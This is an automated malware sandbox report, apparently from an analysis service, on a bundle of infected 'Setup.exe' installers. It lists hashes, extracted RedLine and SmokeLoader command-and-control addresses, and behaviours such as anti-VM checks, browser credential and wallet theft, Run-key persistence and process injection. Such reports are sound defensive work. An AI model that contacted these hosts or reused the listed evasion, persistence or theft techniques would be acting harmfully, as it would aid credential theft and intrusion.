Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
150s -
max time network
1799s -
platform
windows11_x64 -
resource
win11 -
submitted
21/08/2021, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (27).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
dibild
135.148.139.222:33569
Extracted
redline
19.08
95.181.172.100:6795
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral20/memory/4520-374-0x0000000004940000-0x0000000005266000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7148 4788 rundll32.exe 25 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral20/memory/1892-319-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral20/memory/3024-318-0x0000000000000000-mapping.dmp family_redline behavioral20/memory/1892-314-0x0000000000000000-mapping.dmp family_redline behavioral20/memory/3024-323-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
description pid Process procid_target PID 4276 created 572 4276 WerFault.exe 103 PID 4456 created 2980 4456 WerFault.exe 153 PID 3088 created 4524 3088 WerFault.exe 97 PID 4696 created 5048 4696 WerFault.exe 98 PID 3096 created 1000 3096 WerFault.exe 90 PID 2668 created 4440 2668 WerFault.exe 100 PID 1976 created 3024 1976 WerFault.exe 126 PID 2460 created 4520 2460 WerFault.exe 94 PID 1420 created 2292 1420 Process not Found 158 PID 3900 created 492 3900 WerFault.exe 184 PID 6852 created 1880 6852 WerFault.exe 173 PID 6932 created 4844 6932 WerFault.exe 133 PID 6884 created 3156 6884 WerFault.exe 226 PID 6868 created 5104 6868 Esplorarne.exe.com 225 PID 6952 created 4044 6952 Esplorarne.exe.com 216 PID 6700 created 6476 6700 WerFault.exe 338 PID 7056 created 2352 7056 WerFault.exe 766 PID 560 created 5732 560 WerFault.exe 294 PID 1208 created 3992 1208 svrwebui.exe 659 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral20/memory/4440-305-0x0000000004130000-0x00000000041CD000-memory.dmp family_vidar behavioral20/memory/2292-405-0x0000000004B00000-0x0000000004B9D000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 1000 ql6lbKp5925srBDbTvYJfwkm.exe 4548 l_Mj3p4vunohw0luZGFxxkb1.exe 500 09aBxkCrXDDmj3XiCyxEtA23.exe 2248 5nEhi9IZIbRPfduIH1EvVdge.exe 4440 H4erv5l6WEJxWHfLFxpHs7mv.exe 4520 2WK9SLI36KTbDdiSu4mreNHU.exe 572 GkTd_7ikMU7OMXkuur8aPZ7N.exe 4616 r2ej3xhygamYZJR_Dv47zUDo.exe 5048 GYsj3mYnL8gBDKbUbPZpIRQ6.exe 4628 SfUxNE69mEAUGsuKWAdazU5O.exe 4524 6A5q91esR20wkamsBkutPsbh.exe 3092 laPknA7ubFvj_i_QGTMvnn0_.exe 656 43TYr58WmdFAwC2tR_mPogh4.exe 4632 JkEcZxZ3AfcUm5X8zImyJIkb.exe 4648 BMG_GmhfPGrt3H8Z7HF1KdFS.exe 1528 ZdKR5xTcpwDA6ufZb92rS0rx.exe 1004 Puc9Xjoy5UA4rK6___tfSCDs.exe 1440 1iuAXELm7UVJuzYVx6c2wTLA.exe 4956 oMxahy17LUHadopI73SnlOg8.exe 2624 1iuAXELm7UVJuzYVx6c2wTLA.tmp 2816 jooyu.exe 2768 md8_8eus.exe 3324 customer3.exe 2980 oMxahy17LUHadopI73SnlOg8.exe 3936 hBS_VbW.EXE 1080 jfiag3g_gg.exe 4832 BMG_GmhfPGrt3H8Z7HF1KdFS.exe 1892 laPknA7ubFvj_i_QGTMvnn0_.exe 4844 8425144.exe 3024 09aBxkCrXDDmj3XiCyxEtA23.exe 2568 6645266.exe 1984 Conhost.exe 2352 explorer.exe 984 Setup.exe 2292 LGCH2-401_2021-08-18_14-40.exe 1624 Inlog.exe 1012 Cleaner Installation.exe 652 WEATHER Manager.exe 4088 7179660.exe 4980 VPN.exe 4152 WEATHER Manager.tmp 1416 md7_7dfj.exe 2204 Conhost.exe 1880 askinstall53.exe 5184 MediaBurner2.exe 4244 Esplorarne.exe.com 5332 PBrowFile15.exe 5316 WinHoster.exe 5472 zhaoy-game.exe 5548 MediaBurner2.tmp 5676 LivelyScreenRecS1.9.exe 5796 F732.exe 5844 jfiag3g_gg.exe 6064 11111.exe 492 zhaoy-game.exe 4568 3377047_logo_media.exe 4088 7179660.exe 1044 4283430.exe 1304 Setup.exe 5780 4117862.exe 1380 4231225.exe 3016 Esplorarne.exe.com 5308 Setup.exe 2188 NrJ8VPrrsywgo7KaH8AGZkth.exe -
resource yara_rule behavioral20/files/0x000300000002b215-295.dat upx behavioral20/files/0x000300000002b215-294.dat upx -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion l_Mj3p4vunohw0luZGFxxkb1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZdKR5xTcpwDA6ufZb92rS0rx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion r2ej3xhygamYZJR_Dv47zUDo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GcleanerEU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NrJ8VPrrsywgo7KaH8AGZkth.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skQ8TP36pgcPsp5xJeZL1RFY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Puc9Xjoy5UA4rK6___tfSCDs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Puc9Xjoy5UA4rK6___tfSCDs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion l_Mj3p4vunohw0luZGFxxkb1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZdKR5xTcpwDA6ufZb92rS0rx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NrJ8VPrrsywgo7KaH8AGZkth.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skQ8TP36pgcPsp5xJeZL1RFY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion r2ej3xhygamYZJR_Dv47zUDo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GcleanerEU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Esplorarne.exe.com -
Loads dropped DLL 27 IoCs
pid Process 2624 1iuAXELm7UVJuzYVx6c2wTLA.tmp 2624 1iuAXELm7UVJuzYVx6c2wTLA.tmp 1012 Cleaner Installation.exe 4152 WEATHER Manager.tmp 4152 WEATHER Manager.tmp 2204 Conhost.exe 2204 Conhost.exe 4244 Esplorarne.exe.com 4244 Esplorarne.exe.com 5364 rundll32.exe 5364 rundll32.exe 5548 MediaBurner2.tmp 5308 Setup.exe 7088 g90uxw8hJrh44TxICMxWT8tQ.tmp 7088 g90uxw8hJrh44TxICMxWT8tQ.tmp 6596 mask_svc.exe 5404 MsiExec.exe 5404 MsiExec.exe 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6800 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral20/files/0x000200000002b1ca-189.dat themida behavioral20/files/0x000200000002b1ca-209.dat themida behavioral20/files/0x000200000002b1d3-203.dat themida behavioral20/files/0x000200000002b1cd-202.dat themida behavioral20/files/0x000200000002b1cb-206.dat themida behavioral20/files/0x000200000002b1d3-173.dat themida behavioral20/files/0x000200000002b1cd-190.dat themida behavioral20/files/0x000200000002b1cb-165.dat themida behavioral20/memory/1528-263-0x0000000000A80000-0x0000000000A81000-memory.dmp themida behavioral20/memory/4548-261-0x00000000005A0000-0x00000000005A1000-memory.dmp themida behavioral20/memory/4616-260-0x0000000000060000-0x0000000000061000-memory.dmp themida behavioral20/memory/1004-248-0x0000000000160000-0x0000000000161000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6645266.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NrJ8VPrrsywgo7KaH8AGZkth.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GcleanerEU.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA skQ8TP36pgcPsp5xJeZL1RFY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA r2ej3xhygamYZJR_Dv47zUDo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA l_Mj3p4vunohw0luZGFxxkb1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZdKR5xTcpwDA6ufZb92rS0rx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Puc9Xjoy5UA4rK6___tfSCDs.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\I: Setup.exe File opened (read-only) \??\O: Setup.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: Setup.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: Setup.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\G: Setup.exe File opened (read-only) \??\L: Setup.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\X: Setup.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: Setup.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: Setup.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 240 ipinfo.io 2 ip-api.com 36 ipinfo.io 135 ipinfo.io 161 ipinfo.io 167 ipinfo.io 2 ipinfo.io 101 ipinfo.io 129 ipinfo.io 134 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1528 ZdKR5xTcpwDA6ufZb92rS0rx.exe 1004 Puc9Xjoy5UA4rK6___tfSCDs.exe 4548 l_Mj3p4vunohw0luZGFxxkb1.exe 4616 r2ej3xhygamYZJR_Dv47zUDo.exe 6156 GcleanerEU.exe 2188 NrJ8VPrrsywgo7KaH8AGZkth.exe 3808 Esplorarne.exe.com 5764 skQ8TP36pgcPsp5xJeZL1RFY.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4648 set thread context of 4832 4648 BMG_GmhfPGrt3H8Z7HF1KdFS.exe 142 PID 3092 set thread context of 1892 3092 laPknA7ubFvj_i_QGTMvnn0_.exe 149 PID 500 set thread context of 3024 500 09aBxkCrXDDmj3XiCyxEtA23.exe 126 PID 2740 set thread context of 6336 2740 msedge.exe 241 PID 3068 set thread context of 7008 3068 _uTsQfTNLHJzGiTq5uM9a45f.exe 251 PID 5360 set thread context of 6532 5360 Esplorarne.exe.com 242 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe SfUxNE69mEAUGsuKWAdazU5O.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.INTEG.RAW md7_7dfj.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-7OSC6.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-F14TH.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-C665I.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-QASV4.tmp Esplorarne.exe.com File created C:\Program Files (x86)\INL Corpo Brovse\is-2GSFH.tmp mask_svc.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-Q7BFM.tmp mask_svc.exe File created C:\Program Files (x86)\MaskVPN\is-4I3BM.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-8JV7Q.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win732\is-J165R.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-IT8EB.tmp Esplorarne.exe.com File created C:\Program Files (x86)\INL Corpo Brovse\unins000.dat mask_svc.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-N9IBF.tmp mask_svc.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini SfUxNE69mEAUGsuKWAdazU5O.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\unins000.dat mask_svc.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-9J2RC.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-SBT19.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-Q212O.tmp Esplorarne.exe.com File created C:\Program Files (x86)\GameBox INC\GameBox\d md7_7dfj.exe File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-CJ51D.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KKPGI.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-RUMP4.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win764\is-62L3A.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe SfUxNE69mEAUGsuKWAdazU5O.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe SfUxNE69mEAUGsuKWAdazU5O.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File created C:\Program Files (x86)\MaskVPN\is-KU0JF.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe mask_svc.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\javaw.exe mask_svc.exe File created C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb md7_7dfj.exe File created C:\Program Files (x86)\MaskVPN\is-G810B.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win732\is-OJDS9.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win732\is-SL6Q7.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll mask_svc.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-KGPMU.tmp mask_svc.exe File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-T4Q57.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3OJ9V.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-K8LBS.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-Q4VVT.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-OTKIM.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win732\is-J1AG9.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe XUm6ndFX8RsuLO1SFSwJGgz0.exe File created C:\Program Files (x86)\MaskVPN\is-9M29L.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-F1DV1.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-A3BIB.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\unins000.msg Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File created C:\Windows\Installer\f761009.msi Esplorarne.exe.com File opened for modification C:\Windows\Installer\f761009.msi Esplorarne.exe.com File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
pid pid_target Process procid_target 4964 572 WerFault.exe 103 4016 1000 WerFault.exe 90 4920 5048 WerFault.exe 98 3068 4524 WerFault.exe 97 400 2980 WerFault.exe 560 4520 WerFault.exe 94 5460 2292 WerFault.exe 158 5520 492 WerFault.exe 184 7140 1880 WerFault.exe 173 5240 4844 WerFault.exe 133 2808 3156 WerFault.exe 226 5668 6476 WerFault.exe 209 6984 5104 WerFault.exe 225 4672 2352 WerFault.exe 137 4276 5732 WerFault.exe 200 6312 3992 WerFault.exe 204 6428 4580 WerFault.exe 286 4696 4088 WerFault.exe 188 4940 3016 WerFault.exe 195 6528 1016 WerFault.exe 304 4892 1972 WerFault.exe 263 6440 2268 WerFault.exe 309 7092 4532 WerFault.exe 316 6620 2044 WerFault.exe 271 6912 4204 WerFault.exe 359 6208 6156 WerFault.exe 392 1508 1492 WerFault.exe 415 5644 2768 WerFault.exe 114 6904 5352 WerFault.exe 420 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI _uTsQfTNLHJzGiTq5uM9a45f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BMG_GmhfPGrt3H8Z7HF1KdFS.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BMG_GmhfPGrt3H8Z7HF1KdFS.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BMG_GmhfPGrt3H8Z7HF1KdFS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI _uTsQfTNLHJzGiTq5uM9a45f.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI _uTsQfTNLHJzGiTq5uM9a45f.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz _uTsQfTNLHJzGiTq5uM9a45f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString _uTsQfTNLHJzGiTq5uM9a45f.exe Key value queried 